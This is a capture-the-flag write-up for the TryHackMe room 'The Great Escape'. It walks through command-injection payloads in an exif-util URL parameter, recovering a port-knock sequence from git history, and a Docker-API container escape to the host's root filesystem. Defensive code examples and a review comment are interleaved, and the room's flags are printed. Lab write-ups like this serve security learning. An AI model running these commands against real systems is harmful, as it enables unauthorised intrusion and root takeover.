Tryhackme - The Great Escape - Writeup


Task 1 - Introduction


  • IP :

  • nginx 1.19.6

  • using Next and Docker

  • Found 4 Javascript files running as script

  • Run Dirbuster and found

  • Run nmap to check for open ports

Not shown: 998 closed ports
22/tcp open  ssh?
| fingerprint-strings: 
|   GenericLines: 
|_    d&FYg1}9R-/~];wO|1moPpM?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    nginx 1.19.6
| http-robots.txt: 3 disallowed entries 
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt 
|_http-trane-info: Problem with XML parsing of /evox/about

Running nmap with the -d flag to debug.

Port 22 is open, so trying hydra against SSH:

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://

  • got a timeout error

Run Gobuster with common.txt:

gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -t 50 --wildcard


2021/02/14 16:45:16 Starting gobuster
/_conf (Status: 200)
/.bash_history (Status: 200)
/.hta (Status: 200)
/_dev (Status: 200)
/.git/HEAD (Status: 200)
/.svn/entries (Status: 200)
/.mysql_history (Status: 200)
/.svn (Status: 200)
/.swf (Status: 200)
/_css (Status: 200)
/_config (Status: 200)
/api (Status: 301)
/.listings (Status: 200)
/.history (Status: 200)
/.perf (Status: 200)
/.forward (Status: 200)
/.htpasswd (Status: 200)
/.listing (Status: 200)
/AppsLocalLogin (Status: 200)
/contact-us (Status: 200)
/films (Status: 200)
/jsps (Status: 200)
/option (Status: 200)
/registrations (Status: 200)
/svr (Status: 200)
/wp-icludes (Status: 200)

Immune to SQL injection.

/api (Status: 301) > check the URL <ip>/api; it has something we can work with: we can upload a file from the machine or from a URL.

Testing with an HTML file from my machine returns a 503 error.

Set up a URL serving a photo to make sure that the request comes through:

1) Get any image > I got blue.png > cp it to the /thegreatescape/uploads folder
2) Run python3 -m http.server > this runs an HTTP server on my IP
3) Navigate to <my-ip>/blue.png > your picture should be there
4) Navigate to

- the first IP is the target machine, the second one is mine

Returns the exif data of my PNG! > That's good


It seems like we can only upload photo files > HTML does not work > photo classroom

Found something > there is a URL in there

Passing in a param:

Let's check with whoami: ;whoami

Scroll to the bottom to see the output. Next: ;ls%20-la%20/root

/root has dev-note.txt: ;cat%20/root/dev-note.txt


Hey guys,

Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.

Anyways, the password is fluffybunnies123
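The exif-util endpoint above takes a URL parameter and hands it to a shell, which is why a `;` followed by a command runs on the server. As an added example (not the room's code), a minimal reconstruction of that vulnerable shape next to a hardened handler: validate the URL, build an argv list, and never go through a shell. The `exiftool` binary and `run_exif` helper are assumptions for illustration.

```python
import re
import subprocess
from urllib.parse import urlsplit

# Vulnerable shape (constructed to mirror the behaviour seen above; not the room's code):
# the user-supplied URL is interpolated into one shell command line, so a ';' in the
# parameter ends the intended command and whatever follows runs as a second command.
def build_cmd_vulnerable(url: str) -> str:
    return f"exiftool {url}"          # intended to be run with shell=True

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_EXT = (".png", ".jpg", ".jpeg")
# Conservative URL alphabet: no whitespace and none of ; | & $ ` < > (they only matter to a shell,
# but rejecting them early keeps the log of rejected requests readable).
URL_CHARS = re.compile(r"[A-Za-z0-9._~:/?#\[\]@!'()*+,=%-]+")

def is_safe_image_url(url: str) -> bool:
    """True only for a well-formed http(s) URL whose path ends in an image extension."""
    parts = urlsplit(url)            # urlsplit keeps ';' inside the path instead of splitting params
    return (parts.scheme in ALLOWED_SCHEMES
            and bool(parts.netloc)
            and parts.path.lower().endswith(ALLOWED_EXT)
            and URL_CHARS.fullmatch(url) is not None)

def build_cmd_hardened(url: str) -> list:
    """Return an argv list for subprocess.run(argv) with no shell, so no metacharacter is
    interpreted; '--' stops option parsing so a URL starting with '-' cannot become a flag."""
    if not is_safe_image_url(url):
        raise ValueError("rejected URL")
    return ["exiftool", "--", url]

def run_exif(url: str) -> str:
    """Run the hardened argv (hypothetical helper); stdout only, bounded by a timeout."""
    argv = build_cmd_hardened(url)
    return subprocess.run(argv, capture_output=True, text=True, timeout=15).stdout
```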


Hydra

;cat%20/etc/hosts returns:

    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::0    ip6-localnet
ff00::0    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
    api-dev-backup

;cat%20-v%20/root/.gitconfig returns:

email =
    name = Hydra

Checked the git log: ;%20git%20-C%20/root%20log
commit 5242825dfd6b96819f65d17a1c31a99fea4ffb6a
Author: Hydra <>
Date:   Thu Jan 7 16:48:58 2021 +0000

    fixed the dev note

commit 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
Author: Hydra <>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Removed the flag and original dev note b/c Security

commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra <>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes

Do a git show on that commit: ;%20git%20-C%20/root%20show%20a3d30a7d0510dc6565ff9316e3fb84434916dee8

commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra <>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes

diff --git a/dev-note.txt b/dev-note.txt
new file mode 100644
index 0000000..89dcd01
--- /dev/null
+++ b/dev-note.txt
@@ -0,0 +1,9 @@
+Hey guys,
+I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.
+Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.
\ No newline at end of file
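Review bot: dev-note.txt commits the port-knock sequence (42, 1337, 10420, 6969, 63000) that opens the Docker TCP port into the repository; the later commit "Removed the flag and original dev note b/c Security" deletes the file, but as the git show above demonstrates the content stays recoverable from history, and the repository itself sits in /root on a host with a command-injectable web app. The sequence should never have been committed; once it has been, removing the file is not enough, the history has to be rewritten and the sequence changed. Minor: the file has no trailing newline.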
diff --git a/flag.txt b/flag.txt
new file mode 100644
index 0000000..aae8129
--- /dev/null
+++ b/flag.txt
@@ -0,0 +1,3 @@
+You found the root flag, or did you?
\ No newline at end of file

Found a root flag.

The note says to knock on the ports in sequence to open the docker port:

./knock 42 1337 10420 6969 63000

Run nmap against port 2375 again to check:

nmap -v -p 2375
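The knock above turns five connection attempts into an open Docker socket, and that sequence is visible to the defender in firewall logs. As an added example (not from the room or the resource linked below), a detector run over constructed iptables-style LOG lines that flags any source which completes the 42, 1337, 10420, 6969, 63000 sequence in order and then connects to 2375. The log format and addresses are assumptions.

```python
import re
from collections import defaultdict

KNOCK_SEQUENCE = [42, 1337, 10420, 6969, 63000]   # from the recovered dev note
PROTECTED_PORT = 2375                             # Docker TCP socket the knock opens

# Constructed sample: one source completes the knock and hits 2375, another knocks out of order.
SAMPLE_LOG = """\
Feb 14 16:50:01 host kernel: FW IN=eth0 SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=51000 DPT=42 SYN
Feb 14 16:50:01 host kernel: FW IN=eth0 SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=51001 DPT=1337 SYN
Feb 14 16:50:02 host kernel: FW IN=eth0 SRC=10.0.0.7 DST=10.0.0.5 PROTO=TCP SPT=40000 DPT=42 SYN
Feb 14 16:50:02 host kernel: FW IN=eth0 SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=51002 DPT=10420 SYN
Feb 14 16:50:02 host kernel: FW IN=eth0 SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=51003 DPT=6969 SYN
Feb 14 16:50:03 host kernel: FW IN=eth0 SRC=10.0.0.7 DST=10.0.0.5 PROTO=TCP SPT=40001 DPT=6969 SYN
Feb 14 16:50:03 host kernel: FW IN=eth0 SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=51004 DPT=63000 SYN
Feb 14 16:50:05 host kernel: FW IN=eth0 SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=51005 DPT=2375 SYN
Feb 14 16:50:06 host kernel: FW IN=eth0 SRC=10.0.0.7 DST=10.0.0.5 PROTO=TCP SPT=40002 DPT=2375 SYN
"""

LINE_RE = re.compile(r"SRC=(?P<src>\S+) .*?DPT=(?P<dpt>\d+)")

def detect_knock_sequences(log_text: str) -> list:
    """Return (src, timestamp) for each source that completed the knock and then touched 2375."""
    progress = defaultdict(int)   # src -> number of knocks matched so far, in order
    opened = set()                # sources that finished the whole sequence
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src, dpt = m.group("src"), int(m.group("dpt"))
        if dpt == PROTECTED_PORT:
            if src in opened:
                alerts.append((src, line[:15]))   # syslog timestamp prefix
            continue
        if dpt == KNOCK_SEQUENCE[progress[src]]:
            progress[src] += 1
            if progress[src] == len(KNOCK_SEQUENCE):
                opened.add(src)
                progress[src] = 0
        else:
            # a port out of sequence resets the state, the way knockd does; a fresh 42 restarts it
            progress[src] = 1 if dpt == KNOCK_SEQUENCE[0] else 0
    return alerts
```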

Great Resource >> Attacking Docker exposed API

I'm following the steps on that website.

2375/tcp open  docker


{"Platform":{"Name":"Docker Engine - Community"},"Components":[{"Name":"Engine","Version":"20.10.2","Details":{"ApiVersion":"1.41","Arch":"amd64","BuildTime":"2020-12-28T16:15:09.000000000+00:00","Experimental":"false","GitCommit":"8891c58","GoVersion":"go1.13.15","KernelVersion":"4.15.0-130-generic","MinAPIVersion":"1.12","Os":"linux"}},{"Name":"containerd","Version":"1.4.3","Details":{"GitCommit":"269548fa27e0089a8b8278fc4fc781d7f65a939b"}},{"Name":"runc","Version":"1.0.0-rc92","Details":{"GitCommit":"ff819c7e9184c13b7c2607fe6c30ae19403a7aff"}},{"Name":"docker-init","Version":"0.19.0","Details":{"GitCommit":"de40ad0"}}],"Version":"20.10.2","ApiVersion":"1.41","MinAPIVersion":"1.12","GitCommit":"8891c58","GoVersion":"go1.13.15","Os":"linux","Arch":"amd64","KernelVersion":"4.15.0-130-generic","BuildTime":"2020-12-28T16:15:09.000000000+00:00"}

Check out Docker info:

docker -H info
 Debug Mode: false

 Containers: 4
  Running: 4
  Paused: 0
  Stopped: 0
 Images: 27
 Server Version: 20.10.2
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Native Overlay Diff: true
 Logging Driver: json-file
 Cgroup Driver: cgroupfs
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 io.containerd.runtime.v1.linux runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 269548fa27e0089a8b8278fc4fc781d7f65a939b
 runc version: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
 init version: de40ad0
 Security Options:
   Profile: default
 Kernel Version: 4.15.0-130-generic
 Operating System: Ubuntu 18.04.5 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 1
 Total Memory: 983.2MiB
 Name: great-escape.thm
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
 Live Restore Enabled: false

WARNING: API is accessible on without encryption.
         Access to the remote API is equivalent to root access on the host. Refer
         to the 'Docker daemon attack surface' section in the documentation for
         more information:
WARNING: No swap limit support

docker -H ps

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                  NAMES
49fe455a9681        frontend            "/docker-entrypoint.…"   5 weeks ago         Up About an hour>80/tcp     dockerescapecompose_frontend_1
4b51f5742aad        exif-api-dev        "./application -Dqua…"   5 weeks ago         Up About an hour                           dockerescapecompose_api-dev-backup_1
cb83912607b9        exif-api            "./application -Dqua…"   5 weeks ago         Up About an hour    8080/tcp               dockerescapecompose_api_1
548b701caa56        endlessh            "/endlessh -v"           5 weeks ago         Up About an hour>2222/tcp   dockerescapecompose_endlessh_1

Got into the containers:

1) dockerescapecompose_api_1

  • whoami > quarkus

2) dockerescapecompose_frontend_1

  • Per the hint in the first flag, there is a .well-known directory in the frontend:

root@docker-escape:/usr/share/nginx/html/.well-known# cat security.txt
Hey you found me!

The security.txt file is made to help security researchers and ethical hackers to contact the company about security issues.

See for more information.

Ping /api/fl46 with a HEAD request for a nifty treat.

root@kali-virtualbox:~# curl --head

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Thu, 18 Feb 2021 02:50:20 GMT
Connection: keep-alive
flag: THM{b801135794bf1ed3a2aafaa44c2e5ad4}

3) dockerescapecompose_api-dev-backup_1 > dev-note.txt is the same as what we already saw

Last task

Run this command to get Hydra as root:

docker -H run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh

OK, I'm in as Hydra.

# ls -la /root
total 24
drwx------  3 root root 4096 Jan  6 23:37 .
drwxr-xr-x 22 root root 4096 Jan  9 22:11 ..
lrwxrwxrwx  1 root root    9 Jan  6 18:22 .bash_history -> /dev/null
-rw-r-----  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Jan  6 23:35 .local
-rw-r-----  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   74 Jan  6 23:37 flag.txt
# cat flag.txt    
cat: flag.txt: No such file or directory
# cd /root
# pwd
# cat flag.txt    
Congrats, you found the real flag!
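The run command above works for two reasons the info output already warned about: the daemon answers on a plain tcp:// socket, and any caller may bind the host root filesystem into a container. As an added example (not from the room), a small audit that checks a daemon.json fragment for that listener and walks docker-inspect-style container records, flagging host-root and socket bind mounts, privileged containers and host PID sharing. The records below are constructed, not real output from the box.

```python
import json

# Constructed docker-inspect-style records (not the room's real output): a container created the
# way the escape command above does it, a normal service container, and a privileged agent.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/escape", "Config": {"Image": "alpine:3.9"},
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False, "PidMode": ""}},
    {"Name": "/dockerescapecompose_frontend_1", "Config": {"Image": "frontend"},
     "HostConfig": {"Binds": ["/srv/html:/usr/share/nginx/html:ro"], "Privileged": False, "PidMode": ""}},
    {"Name": "/agent", "Config": {"Image": "agent"},
     "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"], "Privileged": True, "PidMode": "host"}},
])

# Host paths that hand a container the host itself (config, root's home, the daemon socket, kernel interfaces).
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/run/docker.sock", "/proc", "/sys")

def audit_container(record: dict) -> list:
    """Return human-readable findings for one inspect record; an empty list means nothing flagged."""
    findings = []
    hc = record.get("HostConfig") or {}
    for bind in hc.get("Binds") or []:
        host_path = bind.split(":")[0]
        exposed = host_path == "/" or any(
            host_path == p or host_path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)
        if exposed:   # ':ro' does not help much: shadow file, keys and the socket are still readable
            findings.append(f"host path {host_path} bind-mounted ({bind})")
    if hc.get("Privileged"):
        findings.append("privileged container")
    if hc.get("PidMode") == "host":
        findings.append("shares host PID namespace")
    return findings

def audit_all(inspect_json: str) -> dict:
    """Map container name -> findings, keeping only containers with at least one finding."""
    results = {}
    for record in json.loads(inspect_json):
        findings = audit_container(record)
        if findings:
            results[record["Name"]] = findings
    return results

def daemon_plain_tcp(daemon_cfg: dict) -> bool:
    """True when daemon.json lists a tcp:// host without tlsverify, the condition behind the
    'API is accessible ... without encryption' warning above. The same listener can also be set
    with -H on the dockerd command line, which this check does not see."""
    hosts = daemon_cfg.get("hosts") or []
    return any(h.startswith("tcp://") for h in hosts) and not daemon_cfg.get("tlsverify", False)
```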